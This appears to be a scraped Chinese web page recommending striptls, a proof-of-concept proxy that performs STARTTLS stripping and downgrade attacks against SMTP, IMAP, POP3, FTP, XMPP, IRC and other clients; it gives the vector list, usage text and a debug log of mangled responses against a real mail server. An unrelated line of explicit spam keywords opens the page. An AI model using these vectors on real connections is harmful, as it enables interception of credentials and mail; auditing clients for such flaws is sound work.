av激情亚洲男人的天堂国语,日韩欧美精品一中文字幕,无码av一区二区三区无码,国产又色又爽又刺激的a片,国产又色又爽又刺激的a片

工具推薦:striptls審計代理

STARTTLS 是對純文本通信協(xié)議的擴(kuò)展。它提供一種方式將純文本連接升級為加密連接(TLS或SSL),而不是另外使用一個端口作加密通信。

striptls是一款端口剝離攻擊的POC實(shí)現(xiàn)。

SMTP

 
 
 
    
  
  
  
  1. SMTP.StripFromCapabilities - server response capability patch 
    2. 
  
  
  
  2. SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code 
    3. 
  
  
  
  3. SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd) 
    4. 
  
  
  
  4. SMTP.StripWithTemporaryError 
    5. 
  
  
  
  5. SMTP.StripWithError 
    6. 
  
  
  
  6. SMTP.ProtocolDowngradeStripExtendedMode 
    7. 
  
  
  
  7. SMTP.InjectCommand
    8.

POP3

 
 
 
    
  
  
  
  1. POP3.StripFromCapabilities 
    2. 
  
  
  
  2. POP3.StripWithError 
    3. 
  
  
  
  3. POP3.UntrustedIntercept
    4.

IMAP

 
 
 
    
  
  
  
  1. IMAP.StripFromCapabilities 
    2. 
  
  
  
  2. IMAP.StripWithError 
    3. 
  
  
  
  3. IMAP.UntrustedIntercept 
    4. 
  
  
  
  4. IMAP.ProtocolDowngradeToV2
    5.

FTP

 
 
 
    
  
  
  
  1. FTP.StripFromCapabilities 
    2. 
  
  
  
  2. FTP.StripWithError 
    3. 
  
  
  
  3. FTP.UntrustedIntercept
    4.

NNTP

 
 
 
    
  
  
  
  1. NNTP.StripFromCapabilities 
    2. 
  
  
  
  2. NNTP.StripWithError 
    3. 
  
  
  
  3. NNTP.UntrustedIntercept
    4.

XMPP

 
 
 
    
  
  
  
  1. XMPP.StripFromCapabilities 
    2. 
  
  
  
  2. XMPP.StripInboundTLS 
    3. 
  
  
  
  3. XMPP.UntrustedIntercept 
    4. 
  
  
  
  4. ACAP (untested) 
    5. 
  
  
  
  5. ACAP.StripFromCapabilities 
    6. 
  
  
  
  6. ACAP.StripWithError 
    7. 
  
  
  
  7. ACAP.UntrustedIntercept
    8.

IRC

 
 
 
    
  
  
  
  1. IRC.StripFromCapabilities 
    2. 
  
  
  
  2. IRC.StripWithError 
    3. 
  
  
  
  3. IRC.UntrustedIntercept 
    4. 
  
  
  
  4. IRC.StripWithNotRegistered 
    5. 
  
  
  
  5. IRC.StripCAPWithNotregistered 
    6. 
  
  
  
  6. IRC.StripWithSilentDrop
    7.

結(jié)果:

 
 
 
    
  
  
  
  1. - [*] client: 127.0.0.1
    2. 
  
  
  
  2. -     [Vulnerable!]  
    3. 
  
  
  
  3. -     [Vulnerable!]  
    4. 
  
  
  
  4. -     [           ]  
    5. 
  
  
  
  5. -     [Vulnerable!]  
    6. 
  
  
  
  6. - [*] client: 192.168.139.1
    7. 
  
  
  
  7. -     [Vulnerable!]  
    8. 
  
  
  
  8. -     [Vulnerable!]  
    9. 
  
  
  
  9. -     [Vulnerable!] 
    10.

實(shí)例:

 
 
 
    
  
  
  
  1. #> python -m striptls --help    # from pip/setup.py#> python striptls --help       # from source / root folderUsage: striptls [options] 
    2. 
  
  
  
  2. 
  
  
  
  3.        example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options: 
    4. 
  
  
  
  4.       -h, --help            show this help message and exit  -v, --verbose         make lots of noise [default] 
    5. 
  
  
  
  5.       -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:] 
    6. 
  
  
  
  6.       -r REMOTE, --remote=REMOTE 
    7. 
  
  
  
  7.                             remote target ip:port to forward sessions to 
    8. 
  
  
  
  8.       -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem] 
    9. 
  
  
  
  9.       -x VECTORS, --vectors=VECTORS 
    10. 
  
  
  
  10.                             Comma separated list of vectors. Use 'ALL' (default) 
    11. 
  
  
  
  11.                             to select all vectors. Available vectors: 
    12. 
  
  
  
  12.                             FTP.StripFromCapabilities, FTP.StripWithError, 
    13. 
  
  
  
  13.                             FTP.UntrustedIntercept, IMAP.StripFromCapabilities, 
    14. 
  
  
  
  14.                             IMAP.StripWithError, IMAP.UntrustedIntercept, 
    15. 
  
  
  
  15.                             NNTP.StripFromCapabilities, NNTP.StripWithError, 
    16. 
  
  
  
  16.                             NNTP.UntrustedIntercept, POP3.StripFromCapabilities, 
    17. 
  
  
  
  17.                             POP3.StripWithError, POP3.UntrustedIntercept, 
    18. 
  
  
  
  18.                             SMTP.ProtocolDowngradeStripExtendedMode, 
    19. 
  
  
  
  19.                             SMTP.StripFromCapabilities, SMTP.StripWithError, 
    20. 
  
  
  
  20.                             SMTP.StripWithInvalidResponseCode, 
    21. 
  
  
  
  21.                             SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept, 
    22. 
  
  
  
  22.                             XMPP.StripFromCapabilities, XMPP.StripInboundTLS, 
    23. 
  
  
  
  23.                             XMPP.UntrustedIntercept [default: ALL]
    24.

安裝:

1.從pip安裝

#> pip install striptls

2.從源安裝

#> setup.py install

示例:

 
 
 
    
  
  
  
  1.                 inbound                    outbound 
    2. 
  
  
  
  2. nbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target] 
    3. 
  
  
  
  3. smtp-client                   striptls                    remote/target
    4.

本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25

審計模式:

在特定的情況下遍歷所有協(xié)議并且跟蹤違反starttls協(xié)議的客戶端。你可以選擇按Ctrl + C來中止審核并打印結(jié)果。

 
 
 
    
  
  
  
  1. #> python striptls --listen localhost:8825 --remote=mail.gmx.net:25 
    2. 
  
  
  
  2. 2016-02-02 22:11:56,275 - INFO     -  ready. 
    3. 
  
  
  
  3. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    4. 
  
  
  
  4. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    5. 
  
  
  
  5. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP):  
    6. 
  
  
  
  6. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    7. 
  
  
  
  7. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    8. 
  
  
  
  8. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP):  
    9. 
  
  
  
  9. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    10. 
  
  
  
  10. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    11. 
  
  
  
  11. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP):  
    12. 
  
  
  
  12. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3):  
    13. 
  
  
  
  13. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3):  
    14. 
  
  
  
  14. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    15. 
  
  
  
  15. 2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    16. 
  
  
  
  16. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    17. 
  
  
  
  17. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    18. 
  
  
  
  18. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP):  
    19. 
  
  
  
  19. 2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP):  
    20. 
  
  
  
  20. 2016-02-02 22:11:56,276 - INFO     - ]), 110: set([]), 143: set([]), 21: set([]), 119: set([]), 25: set([])}> 
    21. 
  
  
  
  21. 2016-02-02 22:12:08,477 - DEBUG    -  - protocol detected (target port) 
    22. 
  
  
  
  22. 2016-02-02 22:12:08,530 - INFO     -  client ('127.0.0.1', 28902) has connected 
    23. 
  
  
  
  23. 2016-02-02 22:12:08,530 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    24. 
  
  
  
  24. 2016-02-02 22:12:08,805 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
    25. 
  
  
  
  25. 2016-02-02 22:12:08,805 - DEBUG    -  
    26. 
  
  
  
  26. 2016-02-02 22:12:09,759 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    27. 
  
  
  
  27. 2016-02-02 22:12:09,850 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    28. 
  
  
  
  28. 2016-02-02 22:12:09,851 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
    29. 
  
  
  
  29. 2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    30. 
  
  
  
  30. 2016-02-02 22:12:09,867 - DEBUG    -  [client] <= [server][mangled] '200 STRIPTLS\r\n'
    31. 
  
  
  
  31. 2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server][mangled] None
    32. 
  
  
  
  32. 2016-02-02 22:12:09,883 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    33. 
  
  
  
  33. 2016-02-02 22:12:09,983 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    34. 
  
  
  
  34. 2016-02-02 22:12:09,992 - DEBUG    -  [client] => [server]          'rset\r\n'
    35. 
  
  
  
  35. 2016-02-02 22:12:10,100 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    36. 
  
  
  
  36. 2016-02-02 22:12:10,116 - WARNING  -  terminated. 
    37. 
  
  
  
  37. 2016-02-02 22:12:13,056 - DEBUG    -  - protocol detected (target port) 
    38. 
  
  
  
  38. 2016-02-02 22:12:13,056 - INFO     -  client ('127.0.0.1', 28905) has connected 
    39. 
  
  
  
  39. 2016-02-02 22:12:13,057 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    40. 
  
  
  
  40. 2016-02-02 22:12:13,241 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    41. 
  
  
  
  41. 2016-02-02 22:12:13,241 - DEBUG    -  
    42. 
  
  
  
  42. 2016-02-02 22:12:14,197 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    43. 
  
  
  
  43. 2016-02-02 22:12:14,289 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    44. 
  
  
  
  44. 2016-02-02 22:12:14,304 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    45. 
  
  
  
  45. 2016-02-02 22:12:14,305 - DEBUG    -  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
    46. 
  
  
  
  46. 2016-02-02 22:12:14,305 - DEBUG    -  [client] => [server][mangled] None
    47. 
  
  
  
  47. 2016-02-02 22:12:14,320 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    48. 
  
  
  
  48. 2016-02-02 22:12:14,411 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    49. 
  
  
  
  49. 2016-02-02 22:12:14,415 - DEBUG    -  [client] => [server]          'rset\r\n'
    50. 
  
  
  
  50. 2016-02-02 22:12:14,520 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    51. 
  
  
  
  51. 2016-02-02 22:12:14,535 - WARNING  -  terminated. 
    52. 
  
  
  
  52. 2016-02-02 22:12:16,649 - DEBUG    -  - protocol detected (target port) 
    53. 
  
  
  
  53. 2016-02-02 22:12:16,650 - INFO     -  client ('127.0.0.1', 28908) has connected 
    54. 
  
  
  
  54. 2016-02-02 22:12:16,650 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    55. 
  
  
  
  55. 2016-02-02 22:12:16,820 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
    56. 
  
  
  
  56. 2016-02-02 22:12:16,820 - DEBUG    -  
    57. 
  
  
  
  57. 2016-02-02 22:12:17,760 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    58. 
  
  
  
  58. 2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    59. 
  
  
  
  59. 2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
    60. 
  
  
  
  60. 2016-02-02 22:12:17,871 - WARNING  -  terminated. 
    61. 
  
  
  
  61. 2016-02-02 22:12:20,071 - DEBUG    -  - protocol detected (target port) 
    62. 
  
  
  
  62. 2016-02-02 22:12:20,072 - INFO     -  client ('127.0.0.1', 28911) has connected 
    63. 
  
  
  
  63. 2016-02-02 22:12:20,072 - INFO     -  connecting to target ('mail.gmx.net', 25) 
    64. 
  
  
  
  64. 2016-02-02 22:12:20,239 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
    65. 
  
  
  
  65. 2016-02-02 22:12:20,240 - DEBUG    -  
    66. 
  
  
  
  66. 2016-02-02 22:12:21,181 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
    67. 
  
  
  
  67. 2016-02-02 22:12:21,269 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
    68. 
  
  
  
  68. 2016-02-02 22:12:21,280 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
    69. 
  
  
  
  69. 2016-02-02 22:12:21,281 - DEBUG    -  [client] <= [server][mangled] '501 Syntax error\r\n'
    70. 
  
  
  
  70. 2016-02-02 22:12:21,281 - DEBUG    -  [client] => [server][mangled] None
    71. 
  
  
  
  71. 2016-02-02 22:12:21,289 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
    72. 
  
  
  
  72. 2016-02-02 22:12:21,381 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
    73. 
  
  
  
  73. 2016-02-02 22:12:21,386 - DEBUG    -  [client] => [server]          'rset\r\n'
    74. 
  
  
  
  74. 2016-02-02 22:12:21,469 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
    75. 
  
  
  
  75. 2016-02-02 22:12:21,485 - WARNING  -  terminated. 
    76. 
  
  
  
  76. 2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server 
    77. 
  
  
  
  77. 2016-02-02 22:12:23,665 - INFO     -  -- audit results -- 
    78. 
  
  
  
  78. 2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
    79. 
  
  
  
  79. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!]  
    80. 
  
  
  
  80. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!]  
    81. 
  
  
  
  81. 2016-02-02 22:12:23,666 - INFO     -     [           ]  
    82. 
  
  
  
  82. 2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
    83.

除了審計模式外還有從服務(wù)端剝離starttls、無效化starttls響應(yīng)、不可行的ssl鏈接(對于客戶端則是不在檢驗(yàn)服務(wù)端的證書是否可信)以及XMPP的追蹤審計的功能。


網(wǎng)頁名稱:工具推薦:striptls審計代理
文章URL:http://uogjgqi.cn/article/ccdjhse.html
掃二維碼與項目經(jīng)理溝通

我們在微信上24小時期待你的聲音

解答本文疑問/技術(shù)咨詢/運(yùn)營咨詢/技術(shù)建議/互聯(lián)網(wǎng)交流